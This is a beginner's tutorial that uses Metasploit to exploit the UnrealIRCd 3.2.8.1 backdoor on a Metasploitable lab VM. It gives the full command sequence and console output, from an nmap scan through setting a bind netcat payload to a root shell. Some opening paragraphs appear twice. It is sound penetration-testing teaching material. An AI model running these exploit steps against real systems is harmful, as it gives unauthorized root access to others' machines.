Hacking Metasploitable #1: Introduction & IRC Hack [Metasploit/Linux/Exploit/How-to]
Starting today, I will start releasing how-tos on hacking the Metasploitable distro of Linux released by the creators of Metasploit in which I will go through how to determine if a system is exploitable, how to use Metasploit, how to load modules and run exploits, and what to do once you have exploited a system.
Metasploit will print out its version including core and API version, how many exploits, auxiliary, and post modules it has loaded as well as how many payloads, encoders, and nops it has loaded. Then it presents the user (us) with the prompt, defined by "msf >".
From here we can start to enter commands. How do we know what to do though? You can receive the help screen and possible options by entering the command:
The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.
To start off a pentest, we need to find the machines on the network. This step is the first step in actually pentesting a network. Note that before a pentest can occur you should have a written contract with explicit allowance for you to do so. Of course this is from a business point of view, so if you make a lab for practice like I did, you can skip right to the testing.
Finding all machines and attack vectors is known as "intelligence gathering" or "enumeration" and is the most important part of conducting a penetration test. There are an infinite number of ways to collect intelligence on a network, company, or single node, but I am going to concentrate on the normal ways of attacking a lab-environment.
To find all targets on our network, we would just run an nmap scan against our subnet. There are many different options for nmap, including host OS discovery, stealthy scans, tracemaps, and many others. To make this tutorial quicker and easier, we are going to assume we know the IP of our target. Since you should be conducting this in a lab environment, you should know the IP of your Metasploitable machine, as well.
My Metasploitable machine is located at 192.168.1.110 and receives its IP address through my router's DHCP server. I will try to make it as dynamic as possible when giving instructions, but if I use screenshots, IPs may be different than yours.
Okay, now let's finally start exploiting this machine.
As previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of msfconsole we can utilize the database built in to save our nmap scans.
Run this command to insure that our database is connected:
To scan this target with nmap and have it placed in the Metasploit database, run the command "db_nmap".
For this target, we are going to run a more thorough scan:
When your database has hosts in it, you can display which ones it has tracked with the "hosts" command.
Mine looks like this right now:
msf > search unreal
To set or change an option, issue the "set" command followed by the option you wish to change and finally the variable you want to change it to, like as follows:
Metasploit has certain "payloads" that we can use to determine what kind of code we want to execute when connecting to the host machine. We are going to statically set which payload to use in this tutorial to understand how to use them.
Since I know which payload I want to use, we won't search for which one to use, but if you want to, you can use the "search" command followed by what you are looking for (e.g. unix shell).
In this case we are going to use the netcat bind payload (if you have not used netcat, I highly suggest it. I will be writing a how-to for beginners on netcat eventually). To use this payload we run the command:
Finally how we interact with this session is to issue the following command:
This completes our tutorial on exploiting the Unreal IRCd backdoor vulnerability in Metasploit and basic tutorial for using msfconsole. If there are any questions as always post them and I will hopefully respond. Thanks for reading!
I hope these posts, starting with this (#1), teach the readers the important parts of using Metasploit as well as the basics of Pentesting and exploitation. This is by no means a thorough series on exploitation, but a way to get basic users' hands wet in the world of exploitation and hacking.
Before we begin, I assume you have Metasploitable installed on VM or host box (I suggest a VM), Metasploit installed on a system (BT5R3 has it automatically installed, which I will be using for this), and a basic understanding on how to use a computer. If you do not have these, please see the linked how-tos or research more upon these topics. Let's begin.
To first understand the basics of this exploit, reading the Vulnerability Summary for CVE-2010-2075 (CVE stands for Common Vulnerabilities and Exposures) which can be read here. Summaries of exploits are commonly released and reviewed by the US government and other large security companies and can be searched for through many sites which are useful for understanding exploits and staying relevant in the security industry.
If you have read the exploit summary, you should have some understanding on how this exploit came to be and why it is dangerous. Backdoors like this are sometimes secretly hidden in software and take a while to come out, leading to scary exploits like this that allow root access quite easily. Now that we've discussed the exploit briefly, lets go over how we find a vulnerable machine and exploit it.
To open Metasploit, run the command:
msfconsoleIt may take a while to open or spit a warning back at you saying that you need to chmod or run as root. If you're not running BT5R3 as default root, then you need to run msfconsole with sudo and enter your sudo password to load it up. If you receive this warning ctrl-c out of it and run
sudo msfconsoleI receive the following:
root@bt:~# msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,\ (oo)____(__) )\||--|| *
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]Whenever you start up Metasploit, there is a cute little banner which is sometimes an animal saying "metasploit" or an astroids based ASCII art. Regardless of what you see there, the important stuff is below.
+ -- --=[ 978 exploits - 523 auxiliary - 160 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops
msf >
Metasploit will print out its version including core and API version, how many exploits, auxiliary, and post modules it has loaded as well as how many payloads, encoders, and nops it has loaded. Then it presents the user (us) with the prompt, defined by "msf >".
From here we can start to enter commands. How do we know what to do though? You can receive the help screen and possible options by entering the command:
helpMetasploit will output the following (I will only display a few lines since there are MANY options):
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
<...snipped...>So we can now see all options available to us. A shortcut for "help" is also a question mark ("?"). Please note that the actual output may be formatted slightly differently since it is a copy from terminal to a blog. I will however try to have it look as close as I can to the original, and where needed have screenshots.
The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.
To start off a pentest, we need to find the machines on the network. This step is the first step in actually pentesting a network. Note that before a pentest can occur you should have a written contract with explicit allowance for you to do so. Of course this is from a business point of view, so if you make a lab for practice like I did, you can skip right to the testing.
Finding all machines and attack vectors is known as "intelligence gathering" or "enumeration" and is the most important part of conducting a penetration test. There are an infinite number of ways to collect intelligence on a network, company, or single node, but I am going to concentrate on the normal ways of attacking a lab-environment.
To find all targets on our network, we would just run an nmap scan against our subnet. There are many different options for nmap, including host OS discovery, stealthy scans, tracemaps, and many others. To make this tutorial quicker and easier, we are going to assume we know the IP of our target. Since you should be conducting this in a lab environment, you should know the IP of your Metasploitable machine, as well.
My Metasploitable machine is located at 192.168.1.110 and receives its IP address through my router's DHCP server. I will try to make it as dynamic as possible when giving instructions, but if I use screenshots, IPs may be different than yours.
Okay, now let's finally start exploiting this machine.
As previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of msfconsole we can utilize the database built in to save our nmap scans.
Run this command to insure that our database is connected:
db_statusYou should receive something along the lines of:
[*] postgresql connected to msf3devIf it spits out an error, then we need to connect our database; however, I will not get into this right now since I want to keep this tutorial on topic of exploitation and pentesting.
To scan this target with nmap and have it placed in the Metasploit database, run the command "db_nmap".
For this target, we are going to run a more thorough scan:
db_nmap -v -sS -A [ip-address]The previous nmap options are as follows:
-v is "verbose" which means it will output more information for us to the screen.Once you run this, a whole lotta stuff should come out at you. Once the scan is done you might be confused with your results, but I'll show you how to easily determine your attack vector.
-sS is the "SYN" or "stealth" scan, which doesn't create a full connection to the host and is thus "stealthy". If you want to know more about this check out the nmap man page or other documention.
-A is an all-encompassing option which includes Operating System detection, version detection (like the -sV option), script scanning, and traceroute.
When your database has hosts in it, you can display which ones it has tracked with the "hosts" command.
Mine looks like this right now:
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.110 00:0C:29:35:72:58 Linux Ubuntu server
Pretty cool, right? IT has the IP, OS, flavor of OS, MAC, and more!
If we were to run a larger nmap scan, there would be many more hosts listed. This is a great way to keep track of which hosts are which while conducting a pentest.
But how does this help us with our exploitation? Metasploit also has the option to display all services detected by typing "services". This is my output after scanning the Metasploitable host:
msf > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.110 21 tcp ftp open vsftpd 2.3.4
192.168.1.110 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.110 23 tcp telnet open Linux telnetd
192.168.1.110 25 tcp smtp open Postfix smtpd
192.168.1.110 53 tcp domain open ISC BIND 9.4.2
192.168.1.110 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.1.110 111 tcp rpcbind open 2 rpc #100000
192.168.1.110 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP
192.168.1.110 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP
192.168.1.110 512 tcp exec open netkit-rsh rexecd
192.168.1.110 513 tcp login open
192.168.1.110 514 tcp tcpwrapped open
192.168.1.110 1099 tcp rmiregistry open GNU Classpath grmiregistry
192.168.1.110 1524 tcp ingreslock open
192.168.1.110 2049 tcp nfs open 2-4 rpc #100003
192.168.1.110 2121 tcp ftp open ProFTPD 1.3.1
192.168.1.110 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5
192.168.1.110 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7
192.168.1.110 5900 tcp vnc open VNC protocol 3.3
192.168.1.110 6000 tcp x11 open access denied
192.168.1.110 6667 tcp irc open Unreal ircd
192.168.1.110 8009 tcp ajp13 open Apache Jserv Protocol v1.3
192.168.1.110 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
Well that is quite a bit more useful. We can see the IP of the host with which port, protocol, and service is being used. On top of that, since we had version detection on, it displays more information about which version of the service is running.
We can see port 6667 is running Unreal ircd. Unreal is a server for irc (internet relay chat), and the "d" at the end of ircd stands for "daemon" which means the port is listening for a service in the background.
Metasploit also has an awesome feature to find exploits, scanners, and other modules with the "search" option. We are going to run the following command to see if there's any modules for Unreal IRC:
search unrealThis produces the following:
msf > search unreal
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/linux/games/ut2004_secure 2004-06-18 00:00:00 UTC good Unreal Tournament 2004 "secure" Overflow (Linux)
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 00:00:00 UTC excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
exploit/windows/games/ut2004_secure 2004-06-18 00:00:00 UTC good Unreal Tournament 2004 "secure" Overflow (Win32)
Unfortunately since the output is so long, it has bumped the description to the following line, but it is still readable.
We can see there are two exploits for Unreal Tournament 2004 for Linux and Windows each, but neither of these are useful. The middle result and interesting one is the exploit for UnrealIRCD 3.2.8.1 Backdoor Command Execution rated as "excellent".
To load a module in Metasploit, we use the "use" command followed by the name of the module:
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) >
As we can see, our prompt has changed to show that we are using an exploit module with the name. When we are using the "use" command, you can use "tab completion" which means if you're stuck, hitting the tab key will either complete the option, or if tapped twice, will display the options (if there are multiple). Most Linux users know this command since it is incredibly useful while moving through a file system or issuing commands quickly.
Now that we have the module loaded, issuing the command "show options" will of course show us the possible options.
msf exploit(unreal_ircd_3281_backdoor) > show optionsThere are only two options possible, and only one target which is automatic since this is only for one operating system. Both the options are required which means the exploit cannot be run without these. We can see the port is already set since IRC servers run on the port 6667 as a normal, but if someone is trying to hide the service on a different port, this can be changed.
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 6667 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
To set or change an option, issue the "set" command followed by the option you wish to change and finally the variable you want to change it to, like as follows:
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.110Of course you would want to set your host IP to whatever the IP address is of your exploitable machine.
RHOST => 192.168.1.110
Metasploit has certain "payloads" that we can use to determine what kind of code we want to execute when connecting to the host machine. We are going to statically set which payload to use in this tutorial to understand how to use them.
Since I know which payload I want to use, we won't search for which one to use, but if you want to, you can use the "search" command followed by what you are looking for (e.g. unix shell).
In this case we are going to use the netcat bind payload (if you have not used netcat, I highly suggest it. I will be writing a how-to for beginners on netcat eventually). To use this payload we run the command:
msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/bind_netcat
PAYLOAD => cmd/unix/bind_netcat
Let's finally exploit this system! The exploit command has certain options such as -j which runs it as a job, or -z which does not interact with the system after exploitation. These can be used in different ways. To view all of them, use the help command followed by what command you need help with (e.g. help exploit).
Running our exploit results in this:
msf exploit(unreal_ircd_3281_backdoor) > exploit -z
[*] Started bind handler
[*] Connected to 192.168.1.110:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500
[*] Session x created in the background.
We see some output, and most notibly at the bottom "command shell session opened" and "session created in the background". If we didn't run this with the -z option and with no payload, the following output would have been produced:
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.1.110:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo aeuPuvLl90yRmhts;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "aeuPuvLl90yRmhts\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session x opened (192.168.1.111:4444 -> 192.168.1.110:49034) at 2012-11-03 23:08:41 -0400
That's a lot of stuff, but it's pretty easy to understand. First it connects to the socket (which is an IP and port), and receives back the two following lines. After it receives those, it sends the backdoor command and accepts two connections. Part of the exploit is echoing certain gibberish, which is then written to two sockets. Those sockets are then read and what is received is output. After the backdoor goes through, a command shell is opened and labeled as "session 1".
Speaking from the the most previous exploit, what we should have is a blank screen. Let's get back to what you should have done previously since this is just another option in our exploiting phase. Keep in mind when issuing exploits there are numerous ways to get where you need to be, and certain options are better than others.
Now, we have session x created in the background, how do we access it? Of course Metasploit has an awesome command for this, which is "sessions":
msf exploit(unreal_ircd_3281_backdoor) > sessionsOf course the IP addresses will be different than yours since we do not have the exact same network, but it should display your exploited system's IP address. The Id will also be the session # that you created, and is variable to how many sessions you have created.
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
x shell unix 192.168.1.111:51923 -> 192.168.1.110:4444 (192.168.1.110)
Finally how we interact with this session is to issue the following command:
msf exploit(unreal_ircd_3281_backdoor) > sessions -i xSo we can see, we interact with the session numbered x, then it brings us to that session which is a command prompt in the exploited machine. Running pwd displays our current working directory, whoami displays which user we have access as, and id displays our uid and gid permissions.
[*] Starting interaction with x...
pwd
/etc/unreal
whoami
root
id
uid=0(root) gid=0(root)
This completes our tutorial on exploiting the Unreal IRCd backdoor vulnerability in Metasploit and basic tutorial for using msfconsole. If there are any questions as always post them and I will hopefully respond. Thanks for reading!